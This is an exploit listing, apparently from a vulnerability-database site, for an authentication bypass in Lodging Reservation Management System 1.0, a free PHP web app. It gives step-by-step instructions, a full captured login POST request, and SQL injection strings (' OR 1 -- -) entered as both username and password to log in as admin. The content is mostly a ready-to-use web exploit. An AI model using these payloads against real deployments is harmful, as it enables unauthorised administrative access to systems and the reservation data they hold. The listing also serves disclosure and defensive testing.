lodging reservation management system 1.0 authentication bypass
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass # Date: 2021-09-20 # Exploit Author: Nitin Sharma(vidvansh) # Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+ # Authentication Bypass: # Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -
Lodging reservation management system 1.0 authentication bypass Vulnerability / Exploit Source : Lodging reservation management system 1.0 authentication bypass
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes